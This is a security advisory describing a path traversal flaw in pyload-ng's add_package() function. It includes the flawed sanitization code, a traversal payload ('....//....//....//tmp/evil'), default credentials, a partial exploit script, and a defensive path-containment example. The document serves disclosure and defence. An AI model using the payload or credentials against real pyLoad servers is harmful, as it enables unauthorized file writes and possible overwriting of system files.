Lack of data validation - Path Traversal In pyload-ng
Description
PyLoad Vulnerable to Path Traversal via Package Folder Name
Insufficient sanitization of package folder names allows writing files outside the intended download directory.
Affected Component
src/pyload/core/api/__init__.py
Function: add_package()
Description
Package folder names are sanitized using insufficient string replacement:
```python
folder = (
    folder.replace("http://", "")
    .replace("https://", "")
    .replace("../", "_")  # Bypassable!
    .replace("..\\", "_")
    .replace(":", "")
    .replace("/", "_")
    .replace("\\", "_")...
```
The ../ replacement is bypassable. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS.
Proof of Concept
Setup
```bash
pip install pyload-ng[all]
pyload -d &
# Default credentials: pyload / pyload
```
Exploit
```python
#!/usr/bin/env python3
import requests

BASE_URL = "http://localhost:8000"
USERNAME = "pyload"
PASSWORD = "pyload"

session = requests.Session()...
```
Verification
Check where files would be written:
```python
import os

download_dir = "/home/user/Downloads"
folder = "....//....//....//tmp/evil"

# Simulate pyLoad's sanitization
sanitized = folder.replace("../", "_").replace("/", "_")
print(f"After pyLoad sanitization: {sanitized}")...
```
Impact
Authenticated users with ADD permission can:
- Write files outside the download directory
- Potentially overwrite system files (depending on permissions)
- Clutter system directories with downloaded content
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
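One way to close this class of bug without rewriting strings is to resolve the final path and confirm it is still inside the download directory. This is an added example, not pyLoad's code or its patch; `resolve_package_dir`, `check_names` and the sample names are hypothetical and constructed for illustration.

```python
import os
import tempfile


def resolve_package_dir(download_dir: str, folder: str) -> str:
    """Return the real path of a package folder, or raise ValueError if it
    would land outside download_dir. Hypothetical helper, not pyLoad code."""
    base = os.path.realpath(download_dir)
    # realpath collapses "..", follows symlinks, and an absolute `folder`
    # replaces `base` in the join, so every escape is visible in `target`.
    target = os.path.realpath(os.path.join(base, folder))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"package folder escapes download dir: {folder!r}")
    return target


def check_names(names):
    """Classify folder names against a scratch download directory."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        download_dir = os.path.join(root, "Downloads")
        os.mkdir(download_dir)
        # Constructed edge case: a symlink inside the download directory
        # that points at its parent.
        os.symlink(root, os.path.join(download_dir, "link"))
        for name in names:
            try:
                resolve_package_dir(download_dir, name)
                results[name] = "allowed"
            except ValueError:
                results[name] = "rejected"
    return results


# Constructed sample input, not taken from the advisory.
SAMPLE_NAMES = ["season1", "shows/season1", "../outside",
                "a/../../outside", "/tmp/evil", "link/outside"]

if __name__ == "__main__":
    for name, verdict in check_names(SAMPLE_NAMES).items():
        print(f"{name!r}: {verdict}")
```

Because the check runs on the resolved path, it does not depend on which character sequences a replacement chain happens to cover.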
| Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
| pypi | pyload-ng | 0.5.0b3.dev100 | |